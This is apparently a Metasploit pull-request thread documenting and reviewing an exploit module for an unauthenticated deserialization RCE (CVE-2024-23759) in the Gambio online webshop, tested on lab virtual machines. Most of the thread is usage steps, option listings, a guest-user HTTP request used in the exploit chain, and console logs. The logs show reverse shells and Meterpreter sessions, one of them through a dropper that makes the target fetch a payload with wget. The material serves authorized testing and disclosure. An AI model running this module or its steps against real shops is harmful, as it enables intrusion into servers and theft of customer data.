Gambio Online Webshop unauthenticated RCE [CVE-2024-23759]

[h00die-gr3y]

A Remote Code Execution vulnerability in Gambio online webshop version 4.9.2.0 and lower allows remote attackers to run arbitrary commands via unauthenticated HTTP POST request. Gambio version 3 is not vulnerable.
The identified vulnerability within Gambio pertains to an insecure deserialization flaw, which ultimately allows an attacker to execute remote code on affected systems.

The insecure deserialization vulnerability in Gambio poses a significant risk to affected systems.
As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands, potentially resulting in complete system compromise, data exfiltration, or unauthorized access to sensitive information.

This module has been tested with:

• Gambio online webshop 4.7.2.0 on Ubuntu 22.04 running in VirtualBox 7.0.14 r161095 (Qt5.15.2).

Installation steps to install the Gambio Online Webshop

• Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
• Here are the installation instructions for VirtualBox on MacOS.
• Download the Gambio Webshop software from here.
• Unzip the package Gambio v4.7.2.0.zip and install the Gambio Online Webshop on your Linux Virtual Machine using the installation instructions provided in the ZIP file. Do not use a Windows VM (see Limitations section).
• When installed, you should be able to access the Webshop either thru HTTP port 80 or HTTPS port 443 depending on your configuration settings.

You are now ready to test the module.

Verification Steps

• Start msfconsole
• use exploit/multi/http/gambio_unauth_rce_cve_2024_23759
• set rhosts <ip-target>
• set rport <port>
• set target <0=PHP, 1=Unix Command, 2=Linux Dropper>
• exploit
• you should get a reverse shell or Meterpreter session depending on the payload and target settings

msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > info

       Name: Gambio Online Webshop unauthenticated PHP Deserialization Vulnerability
     Module: exploit/multi/http/gambio_unauth_rce_cve_2024_23759
   Platform: PHP, Unix, Linux
       Arch: php, cmd, x64, x86
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2024-01-19

Provided by:
  h00die-gr3y <[email protected]>
  usd Herolab

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   PHP
      1   Unix Command
      2   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS     192.168.201.25   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasplo
                                        it/basics/using-metasploit.html
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       The Gambia Webshop endpoint URL
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host
  WEBSHELL                    no        Set webshell name without extension. Name will be randomly generated if
                                         left unset.


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address
                                       on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.


  When TARGET is not 0:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)

Payload information:

Description:
  A Remote Code Execution vulnerability in Gambio online webshop version 4.9.2.0 and lower
  allows remote attackers to run arbitrary commands via unauthenticated HTTP POST request.
  The identified vulnerability within Gambio pertains to an insecure deserialization flaw,
  which ultimately allows an attacker to execute remote code on affected systems.
  The insecure deserialization vulnerability in Gambio poses a significant risk to affected systems.
  As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,
  potentially resulting in complete system compromise, data exfiltration, or unauthorized access
  to sensitive information.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2024-23759
  https://attackerkb.com/topics/cxCsICfcDY/cve-2024-23759
  https://herolab.usd.de/en/security-advisories/usd-2023-0046/


View the full module info with the info -d command.

Scenarios

Target 0 - PHP native php/meterpreter/reverse_tcp session

msf6 > use exploits/multi/http/gambio_unauth_rce_cve_2024_23759
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set rhosts 192.168.201.25
rhosts => 192.168.201.25
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set rport 80
rport => 80
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set lhost 192.168.201.8
lhost => 192.168.201.8
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.25:80 can be exploited.
[+] The target appears to be vulnerable. It looks like Gambio Webshop is running.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.25
[+] Deleted GmacadJjQQOXMux.php
[*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.25:60348) at 2024-03-24 09:15:50 +0000

meterpreter > sysinfo
Computer    : cuckoo
OS          : Linux cuckoo 5.15.0-101-generic #111-Ubuntu SMP Tue Mar 5 20:16:58 UTC 2024 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data
meterpreter > pwd
/var/www
meterpreter > exit

Target 1 - Unix Command cmd/unix/reverse_bash session

msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set target 1
target => 1
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.25:80 can be exploited.
[+] The target appears to be vulnerable. It looks like Gambio Webshop is running.
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted UJoQmnhL.php
[*] Command shell session 2 opened (192.168.201.8:4444 -> 192.168.201.25:50728) at 2024-03-24 09:17:46 +0000

uname -a
Linux cuckoo 5.15.0-101-generic #111-Ubuntu SMP Tue Mar 5 20:16:58 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),29(audio)
exit

Target 2 - Linux Dropper linux/x64/meterpreter/reverse_tcp session

msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set target 2
target => 2
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.25:80 can be exploited.
[+] The target appears to be vulnerable. It looks like Gambio Webshop is running.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.8:8080/ODk0gcrj
[*] Client 192.168.201.25 (Wget/1.21.2) requested /ODk0gcrj
[*] Sending payload to 192.168.201.25 (Wget/1.21.2)
[*] Sending stage (3045380 bytes) to 192.168.201.25
[+] Deleted gJlhCqCPLrR.php
[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.25:46426) at 2024-03-24 09:18:23 +0000
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.201.25
OS           : Ubuntu 22.04 (Linux 5.15.0-101-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter > pwd
/var/www
meterpreter > exit

Limitations

Gambio is also supported on Windows systems, however the admin access seems to be broken on the vulnerable versions.
This causes the exploit not to run successfully.

[jheysel-r7]

Thanks for the great module @h00die-gr3y. I was wondering if you might be able to elaborate on in the Installation Steps part of the documentation, if you wouldn't mind?

Edit: I was able to install the application and get a test site up and however I'm now running into an issue where the webshell upload is failing. Specifically, when the module attempts to create a guest user to get a valid session cookie I'm receiving a 200 instead of a 302. Not sure if this is an issue with the module or my installation, installation tips would be appreciated!

[h00die-gr3y]

Thanks for the great module @h00die-gr3y. I was wondering if you might be able to elaborate on in the Installation Steps part of the documentation, if you wouldn't mind?

Edit: I was able to install the application and get a test site up and however I'm now running into an issue where the webshell upload is failing. Specifically, when the module attempts to create a guest user to get a valid session cookie I'm receiving a 200 instead of a 302. Not sure if this is an issue with the module or my installation, installation tips would be appreciated!

@jheysel-r7 that is awkward. Which version did you install v4.7.2.0?
You should get a 302 response. I have pasted my burp request and response.
Do you get the session cookie in your response?

By the way, there is something strange going on with the country setting. In my case, only country=8 works. Other values throw a 200 or in case of country=10, it throws a 500 error. This could trigger this behavior.

UPDATE 17 April 19:35 CET: I found the reason. In the admin panel, you can activate countries for tax calculations. Only country settings with activated countries will work. In my case only country 8 (Antarctica) is activated. In your case this could be another country (check http://your_ip/admin/countries.php).

Anyhow, based on this finding, I need to update the exploit. On the main page, I can grab the available country setting(s) that can be used for the creation of the guest user.

Good catch, my friend !!!

Request

POST /shop.php?do=CreateGuest/Proceed HTTP/1.1
Host: 192.168.201.25
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 314
Connection: close

firstname=albert&lastname=hall&email_address=albert.hall%40mg4vigajd.kfw.wcb.z3tyvon7.sqov5ebkt.gov&email_address_confirm=albert.hall%40mg4vigajd.kfw.wcb.z3tyvon7.sqov5ebkt.gov&b2b_status=0&company=&vat=&street_address=nimgtewxwrvn&postcode=67323&city=qrrynwcgevg&country=8&telephone=9612904323&fax=&action=process

Response

HTTP/1.1 302 Found
Date: Wed, 17 Apr 2024 16:49:57 GMT
Server: Apache/2.4.52 (Ubuntu)
Set-Cookie: GXsid_09529a70d105f1a0=g0pc2krkvu4dasc6gblfj16s2n; path=/; domain=192.168.201.25; HttpOnly; SameSite=Lax
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Set-Cookie: GXsid_09529a70d105f1a0=kpfqnun2o8731flqnqc1687kqk; path=/; domain=192.168.201.25; HttpOnly; SameSite=Lax
Location: http://192.168.201.25/shopping_cart.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

[jheysel-r7]

Thanks for the great module @h00die-gr3y. I was wondering if you might be able to elaborate on in the Installation Steps part of the documentation, if you wouldn't mind?
Edit: I was able to install the application and get a test site up and however I'm now running into an issue where the webshell upload is failing. Specifically, when the module attempts to create a guest user to get a valid session cookie I'm receiving a 200 instead of a 302. Not sure if this is an issue with the module or my installation, installation tips would be appreciated!

@jheysel-r7 that is awkward. Which version did you install v4.7.2.0? You should get a 302 response. I have pasted my burp request and response. Do you get the session cookie in your response?

By the way, there is something strange going on with the country setting. In my case, only country=8 works. Other values throw a 200 or in case of country=10, it throws a 500 error. This could trigger this behavior.

UPDATE 17 April 19:35 CET: I found the reason. In the admin panel, you can activate countries for tax calculations. Only country settings with activated countries will work. In my case only country 8 (Antarctica) is activated. In your case this could be another country (check http://your_ip/admin/countries.php).

Anyhow, based on this finding, I need to update the exploit. On the main page, I can grab the available country setting(s) that can be used for the creation of the guest user.

Good catch, my friend !!!

Request

POST /shop.php?do=CreateGuest/Proceed HTTP/1.1
Host: 192.168.201.25
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 314
Connection: close

firstname=albert&lastname=hall&email_address=albert.hall%40mg4vigajd.kfw.wcb.z3tyvon7.sqov5ebkt.gov&email_address_confirm=albert.hall%40mg4vigajd.kfw.wcb.z3tyvon7.sqov5ebkt.gov&b2b_status=0&company=&vat=&street_address=nimgtewxwrvn&postcode=67323&city=qrrynwcgevg&country=8&telephone=9612904323&fax=&action=process

Response

HTTP/1.1 302 Found
Date: Wed, 17 Apr 2024 16:49:57 GMT
Server: Apache/2.4.52 (Ubuntu)
Set-Cookie: GXsid_09529a70d105f1a0=g0pc2krkvu4dasc6gblfj16s2n; path=/; domain=192.168.201.25; HttpOnly; SameSite=Lax
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Set-Cookie: GXsid_09529a70d105f1a0=kpfqnun2o8731flqnqc1687kqk; path=/; domain=192.168.201.25; HttpOnly; SameSite=Lax
Location: http://192.168.201.25/shopping_cart.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

@h00die-gr3y, thanks so much for digging into this and figuring out what was going on! My tax zone was set to only Germany, I tried switching to Antarctica, was still seeing the same issue but when I selected Activate All on the countries.php page, I then got a session.

msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > rexploit
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 172.16.199.131:80 can be exploited.
[!] The service is running, but could not be validated. It looks like Gambio Webshop is running.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 172.16.199.131
[+] Deleted stNqVLuUD.php
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:35906) at 2024-04-17 11:45:50 -0700

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : msfuser-virtual-machine
OS          : Linux msfuser-virtual-machine 6.2.0-35-generic #35~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Oct  6 10:23:26 UTC 2 x86_64
Meterpreter : php/linux
meterpreter >

[h00die-gr3y]

Thanks for the great module @h00die-gr3y. I was wondering if you might be able to elaborate on in the Installation Steps part of the documentation, if you wouldn't mind?
Edit: I was able to install the application and get a test site up and however I'm now running into an issue where the webshell upload is failing. Specifically, when the module attempts to create a guest user to get a valid session cookie I'm receiving a 200 instead of a 302. Not sure if this is an issue with the module or my installation, installation tips would be appreciated!

@jheysel-r7 that is awkward. Which version did you install v4.7.2.0? You should get a 302 response. I have pasted my burp request and response. Do you get the session cookie in your response?
By the way, there is something strange going on with the country setting. In my case, only country=8 works. Other values throw a 200 or in case of country=10, it throws a 500 error. This could trigger this behavior.
UPDATE 17 April 19:35 CET: I found the reason. In the admin panel, you can activate countries for tax calculations. Only country settings with activated countries will work. In my case only country 8 (Antarctica) is activated. In your case this could be another country (check http://your_ip/admin/countries.php).
Anyhow, based on this finding, I need to update the exploit. On the main page, I can grab the available country setting(s) that can be used for the creation of the guest user.
Good catch, my friend !!!
Request

POST /shop.php?do=CreateGuest/Proceed HTTP/1.1
Host: 192.168.201.25
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 314
Connection: close

firstname=albert&lastname=hall&email_address=albert.hall%40mg4vigajd.kfw.wcb.z3tyvon7.sqov5ebkt.gov&email_address_confirm=albert.hall%40mg4vigajd.kfw.wcb.z3tyvon7.sqov5ebkt.gov&b2b_status=0&company=&vat=&street_address=nimgtewxwrvn&postcode=67323&city=qrrynwcgevg&country=8&telephone=9612904323&fax=&action=process

Response

HTTP/1.1 302 Found
Date: Wed, 17 Apr 2024 16:49:57 GMT
Server: Apache/2.4.52 (Ubuntu)
Set-Cookie: GXsid_09529a70d105f1a0=g0pc2krkvu4dasc6gblfj16s2n; path=/; domain=192.168.201.25; HttpOnly; SameSite=Lax
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Set-Cookie: GXsid_09529a70d105f1a0=kpfqnun2o8731flqnqc1687kqk; path=/; domain=192.168.201.25; HttpOnly; SameSite=Lax
Location: http://192.168.201.25/shopping_cart.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

@h00die-gr3y, thanks so much for digging into this and figuring out what was going on! My tax zone was set to only Germany, I tried switching to Antarctica, was still seeing the same issue but when I selected Activate All on the countries.php page, I then got a session.

msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > rexploit
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 172.16.199.131:80 can be exploited.
[!] The service is running, but could not be validated. It looks like Gambio Webshop is running.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 172.16.199.131
[+] Deleted stNqVLuUD.php
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:35906) at 2024-04-17 11:45:50 -0700

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : msfuser-virtual-machine
OS          : Linux msfuser-virtual-machine 6.2.0-35-generic #35~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Oct  6 10:23:26 UTC 2 x86_64
Meterpreter : php/linux
meterpreter >

@jheysel-r7 , added the logic to grab the tax country options configured at the application before creating the guest user. This should fix the issue. See 331c961.

[jheysel-r7]

Thanks for fixing that country tax code issue @h00die-gr3y! Everything worked perfectly after the fix. I re-tested the module with the couple minor fixes I added as apart of this review. I'll land it once CI tests pass

Testing all 3 targets on Ubuntu 22.04 running Gambio 4.7.2.0

msf6 > use gambio_unauth_rce

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ----                                                 ---------------  ----       -----  -----------
   0  exploit/multi/http/gambio_unauth_rce_cve_2024_23759  2024-01-19       excellent  Yes    Gambio Online Webshop unauthenticated PHP Deserialization Vulnerability
   1  \_ target: PHP                                       .                .          .      .
   2  \_ target: Unix Command                              .                .          .      .
   3  \_ target: Linux Dropper                             .                .          .      .


Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/http/gambio_unauth_rce_cve_2024_23759
After interacting with a module you can manually set a TARGET with set TARGET 'Linux Dropper'

[*] Using exploit/multi/http/gambio_unauth_rce_cve_2024_23759
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set rhosts 172.16.199.131
rhosts => 172.16.199.131
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set rport 80
rport => 80
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set targeturi /GX4/Shopsystem/Dateien/
targeturi => /GX4/Shopsystem/Dateien/
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 172.16.199.131:80 can be exploited.
[!] The service is running, but could not be validated. It looks like Gambio Webshop is running.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 172.16.199.131
[+] Deleted BFuxmTqXsRWL.php
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:39636) at 2024-04-19 10:15:15 -0700

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : msfuser-virtual-machine
OS          : Linux msfuser-virtual-machine 6.5.0-27-generic #28~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 15 10:51:06 UTC 2 x86_64
Meterpreter : php/linux
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set target 1
target => 1
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 172.16.199.131:80 can be exploited.
[!] The service is running, but could not be validated. It looks like Gambio Webshop is running.
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted qeALOikWyPPyY.php
[*] Command shell session 2 opened (172.16.199.1:4444 -> 172.16.199.131:53736) at 2024-04-19 10:17:07 -0700

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux msfuser-virtual-machine 6.5.0-27-generic #28~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 15 10:51:06 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 2? [y/N]  y

[*] 172.16.199.131 - Command shell session 2 closed.  Reason: User exit
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set target 2
target => 2
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 172.16.199.131:80 can be exploited.
[!] The service is running, but could not be validated. It looks like Gambio Webshop is running.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://172.16.199.1:8080/22nwaokgZbpn
[*] Client 172.16.199.131 (Wget/1.21.2) requested /22nwaokgZbpn
[*] Sending payload to 172.16.199.131 (Wget/1.21.2)
[*] Sending stage (3045380 bytes) to 172.16.199.131
[+] Deleted JgOOgKvzwakx.php
[*] Meterpreter session 3 opened (172.16.199.1:4444 -> 172.16.199.131:43288) at 2024-04-19 10:17:46 -0700
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 172.16.199.131
OS           : Ubuntu 22.04 (Linux 6.5.0-27-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

[h00die-gr3y]

Cool. Thanks!

[jheysel-r7]

Release Notes

This adds a module for a Remote Code Execution vulnerability in Gambio Online Webshop version 4.9.2.0 and lower allows remote attackers to run arbitrary commands via unauthenticated HTTP POST request.